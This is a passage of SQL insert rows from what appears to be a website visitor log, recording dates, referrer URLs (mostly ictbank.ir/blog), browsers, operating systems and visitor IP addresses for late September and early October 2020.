(5123,'2020-09-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.111.32','000',0,1,0),
(5124,'2020-09-26','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','188.165.148.31','000',0,1,0),
(5125,'2020-09-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','88.198.94.227','000',0,1,0),
(5126,'2020-09-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.231.159.59','000',0,3,0),
(5127,'2020-09-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.153.29','000',0,2,0),
(5128,'2020-09-26','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5129,'2020-09-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.49.233','000',0,1,0),
(5130,'2020-09-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','34.67.241.133','000',0,3,0),
(5131,'2020-09-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5132,'2020-09-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.126.92.8','000',0,1,0),
(5133,'2020-09-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.87.33','000',0,1,0),
(5134,'2020-09-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','89.35.52.19','000',0,2,0),
(5135,'2020-09-26','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','34.222.161.102','000',0,1,0),
(5136,'2020-09-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5137,'2020-09-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(5138,'2020-09-26','http://mail.design-arena.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','104.248.8.188','000',0,2,0),
(5139,'2020-09-26','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','88.99.35.19','000',0,1,0),
(5140,'2020-09-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','89.35.52.19','000',0,2,0),
(5141,'2020-09-27','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','185.96.162.71','000',0,2,0),
(5142,'2020-09-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.189.181.170','000',0,1,0),
(5143,'2020-09-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.139.60','000',0,1,0),
(5144,'2020-09-27','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','212.82.46.203','000',0,1,0),
(5145,'2020-09-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(5146,'2020-09-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(5147,'2020-09-27','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','82.99.229.34','000',0,1,0),
(5148,'2020-09-27','http://ictbank.ir/blog','Chrome','OpenBSD','',NULL,NULL,'','185.225.17.63','000',0,1,0),
(5149,'2020-09-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,4,0),
(5150,'2020-09-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.132.164','000',0,1,0),
(5151,'2020-09-27','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','49.204.231.243','000',0,6,0),
(5152,'2020-09-27','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','206.189.117.9','000',0,1,0),
(5153,'2020-09-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.6.244','000',0,1,0),
(5154,'2020-09-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','84.21.170.210','000',0,1,0),
(5155,'2020-09-27','https://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','213.207.195.50','000',0,1,0),
(5156,'2020-09-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','46.209.238.10','000',0,1,0),
(5157,'2020-09-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.254.131','000',0,1,0),
(5158,'2020-09-27','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','209.58.130.54','000',0,1,0),
(5159,'2020-09-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.195.24.105','000',0,1,0),
(5160,'2020-09-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(5161,'2020-09-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5162,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.222.102.254','000',0,3,0),
(5163,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.137.181.126','000',0,3,0),
(5164,'2020-09-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,6,0),
(5165,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.198.85','000',0,1,0),
(5166,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.28','000',0,1,0),
(5167,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.20','000',0,1,0),
(5168,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.19','000',0,1,0),
(5169,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','115.124.64.126','000',0,1,0),
(5170,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.205','000',0,1,0),
(5171,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','43.241.58.1','000',0,1,0),
(5172,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.5','000',0,1,0),
(5173,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.143','000',0,1,0),
(5174,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.161.116.175','000',0,1,0),
(5175,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.161','000',0,1,0),
(5176,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.111.21','000',0,1,0),
(5177,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.46.190','000',0,1,0),
(5178,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(5179,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.44.61.241','000',0,2,0),
(5180,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.120.33','000',0,1,0),
(5181,'2020-09-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.99.229.34','000',0,2,0),
(5182,'2020-09-28','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','46.4.21.234','000',0,4,0),
(5183,'2020-09-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(5184,'2020-09-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','217.218.21.242','000',0,2,0),
(5185,'2020-09-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','60.246.3.185','000',0,1,0),
(5186,'2020-09-28','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','60.246.2.105','000',0,1,0),
(5187,'2020-09-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(5188,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.159.38.107','000',0,1,0),
(5189,'2020-09-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','213.32.113.142','000',0,2,0),
(5190,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.92.95','000',0,1,0),
(5191,'2020-09-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','95.216.113.228','000',0,1,0),
(5192,'2020-09-28','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.54.54.188','000',0,2,0),
(5193,'2020-09-28','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.231.13.76','000',0,1,0),
(5194,'2020-09-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.161.119.104','000',0,2,0),
(5195,'2020-09-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5196,'2020-09-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(5197,'2020-09-29','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','117.50.127.89','000',0,3,0),
(5198,'2020-09-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','110.229.219.28','000',0,2,0),
(5199,'2020-09-29','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','183.60.141.171','000',0,1,0),
(5200,'2020-09-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.133','000',0,4,0),
(5201,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.132','000',0,1,0),
(5202,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.130','000',0,2,0),
(5203,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.23','000',0,2,0),
(5204,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.18','000',0,6,0),
(5205,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.19','000',0,6,0),
(5206,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.25','000',0,4,0),
(5207,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.21','000',0,3,0),
(5208,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.140','000',0,3,0),
(5209,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.27','000',0,6,0),
(5210,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.24','000',0,3,0),
(5211,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.16','000',0,4,0),
(5212,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.142','000',0,3,0),
(5213,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.26','000',0,3,0),
(5214,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.139','000',0,5,0),
(5215,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.131','000',0,3,0),
(5216,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.17','000',0,5,0),
(5217,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.141','000',0,2,0),
(5218,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.138','000',0,2,0),
(5219,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.134','000',0,4,0),
(5220,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.143','000',0,3,0),
(5221,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.20','000',0,4,0),
(5222,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.154.142','000',0,1,0),
(5223,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.135','000',0,3,0),
(5224,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','59.103.141.40','000',0,1,0),
(5225,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','49.151.100.228','000',0,1,0),
(5226,'2020-09-29','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','181.214.14.33','000',0,1,0),
(5227,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.22','000',0,2,0),
(5228,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','116.110.4.99','000',0,1,0),
(5229,'2020-09-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','52.149.182.125','000',0,1,0),
(5230,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','92.251.123.239','000',0,1,0),
(5231,'2020-09-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,3,0),
(5232,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.86.157','000',0,1,0),
(5233,'2020-09-29','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5234,'2020-09-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.99.229.34','000',0,3,0),
(5235,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','190.211.14.158','000',0,1,0),
(5236,'2020-09-29','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','114.4.213.241','000',0,1,0),
(5237,'2020-09-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','208.115.198.54','000',0,1,0),
(5238,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','113.173.18.112','000',0,1,0),
(5239,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.197.222','000',0,1,0),
(5240,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.202.76.139','000',0,2,0),
(5241,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.105.181','000',0,1,0),
(5242,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','197.60.27.237','000',0,1,0),
(5243,'2020-09-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(5244,'2020-09-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5245,'2020-09-29','http://ictbank.ir/blog','Android Browser','Android','2.0',NULL,NULL,'','220.181.77.162','000',0,2,0),
(5246,'2020-09-29','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','178.62.82.141','000',0,7,0),
(5247,'2020-09-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','110.229.221.135','000',0,1,0),
(5248,'2020-09-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,6,0),
(5249,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.143','000',0,2,0),
(5250,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.25','000',0,1,0),
(5251,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.24','000',0,2,0),
(5252,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.141','000',0,1,0),
(5253,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','191.253.86.58','000',0,1,0),
(5254,'2020-09-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(5255,'2020-09-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','217.218.21.242','000',0,2,0),
(5256,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.238.58','000',0,1,0),
(5257,'2020-09-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.87','000',0,1,0),
(5258,'2020-09-30','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.81.245.94','000',0,1,0),
(5259,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','49.205.243.15','000',0,1,0),
(5260,'2020-09-30','http://ictbank.ir/blog','WeChat','iOS','10.3.3',NULL,NULL,'','49.233.143.96','000',0,2,0),
(5261,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','103.51.94.251','000',0,1,0),
(5262,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','36.99.136.132','000',0,1,0),
(5263,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.22','000',0,4,0),
(5264,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.23','000',0,3,0),
(5265,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','183.87.39.88','000',0,1,0),
(5266,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.161.102.139','000',0,1,0),
(5267,'2020-09-30','http://ictbank.ir/blog','Unknown','Android','7.0',NULL,NULL,'','217.160.172.202','000',0,2,0),
(5268,'2020-09-30','http://ictbank.ir/blog','Android Browser','Android','2.2',NULL,NULL,'','220.181.77.162','000',0,4,0),
(5269,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.126.92.241','000',0,1,0),
(5270,'2020-09-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.137.204.28','000',0,32,0),
(5271,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.19','000',0,1,0),
(5272,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.130.52','000',0,1,0),
(5273,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.21','000',0,1,0),
(5274,'2020-09-30','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','209.242.216.180','000',0,2,0),
(5275,'2020-09-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','110.229.220.95','000',0,1,0),
(5276,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.28.33.173','000',0,2,0),
(5277,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','107.173.230.202','000',0,2,0),
(5278,'2020-09-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.99.229.34','000',0,1,0),
(5279,'2020-09-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.226','000',0,1,0),
(5280,'2020-09-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(5281,'2020-09-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(5282,'2020-09-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.70','000',0,1,0),
(5283,'2020-09-30','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','190.113.110.239','000',0,1,0),
(5284,'2020-10-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','202.137.134.77','000',0,1,0),
(5285,'2020-10-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(5286,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.131.146','000',0,1,0),
(5287,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.33.61.231','000',0,1,0),
(5288,'2020-10-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,3,0),
(5289,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.189.7.27','000',0,1,0),
(5290,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.32','000',0,1,0),
(5291,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.157.15.104','000',0,1,0),
(5292,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.156.14','000',0,1,0),
(5293,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.66','000',0,1,0),
(5294,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.120.47','000',0,1,0),
(5295,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.141','000',0,1,0),
(5296,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.160.30.210','000',0,1,0),
(5297,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.172','000',0,1,0),
(5298,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.236.133.77','000',0,1,0),
(5299,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.106','000',0,1,0),
(5300,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.19','000',0,2,0),
(5301,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.18','000',0,1,0),
(5302,'2020-10-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','217.218.21.242','000',0,1,0),
(5303,'2020-10-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.99.229.34','000',0,1,0),
(5304,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.112.4','000',0,1,0),
(5305,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','89.187.162.187','000',0,1,0),
(5306,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.127.199','000',0,1,0),
(5307,'2020-10-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','110.229.220.95','000',0,1,0),
(5308,'2020-10-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.234','000',0,1,0),
(5309,'2020-10-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.15.237','000',0,1,0),
(5310,'2020-10-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(5311,'2020-10-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(5312,'2020-10-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(5313,'2020-10-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(5314,'2020-10-01','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','36.5.199.129','000',0,1,0),
(5315,'2020-10-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','194.180.179.58','000',0,1,0),
(5316,'2020-10-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','39.101.65.235','000',0,1,0),
(5317,'2020-10-02','http://ictbank.ir/blog','Chrome','OS X','10.10.2',NULL,NULL,'','89.248.172.208','000',0,1,0),
(5318,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.192.244.82','000',0,1,0),
(5319,'2020-10-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','110.164.175.19','000',0,1,0),
(5320,'2020-10-02','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.235.118.98','000',0,2,0),
(5321,'2020-10-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','217.218.21.242','000',0,3,0),
(5322,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.148.17.2','000',0,1,0),
(5323,'2020-10-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(5324,'2020-10-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','176.113.115.214','000',0,3,0),
(5325,'2020-10-02','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','79.12.220.16','000',0,1,0),
(5326,'2020-10-02','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(5327,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.139.12','000',0,1,0),
(5328,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.180.164','000',0,1,0),
(5329,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.180.146','000',0,1,0),
(5330,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.154.242.189','000',0,1,0),
(5331,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.177.44','000',0,1,0),
(5332,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.83.206','000',0,1,0),
(5333,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.58.87.183','000',0,1,0),
(5334,'2020-10-02','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.10','000',0,1,0),
(5335,'2020-10-02','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.75','000',0,1,0),
(5336,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.104.207','000',0,1,0),
(5337,'2020-10-02','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','103.96.37.90','000',0,1,0),
(5338,'2020-10-02','http://ictbank.ir/blog','Chrome','Android','9',NULL,NULL,'','188.40.244.235','000',0,5,0),
(5339,'2020-10-02','http://ictbank.ir/blog','WeChat','iOS','10.3.3',NULL,NULL,'','111.231.81.165','000',0,6,0),
(5340,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.111.21','000',0,1,0),
(5341,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.230.1','000',0,1,0),
(5342,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.12.253.83','000',0,1,0),
(5343,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.210.90.252','000',0,1,0),
(5344,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','82.166.143.97','000',0,1,0),
(5345,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.46.200','000',0,1,0),
(5346,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.181','000',0,1,0),
(5347,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.211.219.119','000',0,1,0),
(5348,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.56','000',0,1,0),
(5349,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','68.65.123.76','000',0,1,0),
(5350,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.135','000',0,1,0),
(5351,'2020-10-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.160','000',0,1,0),
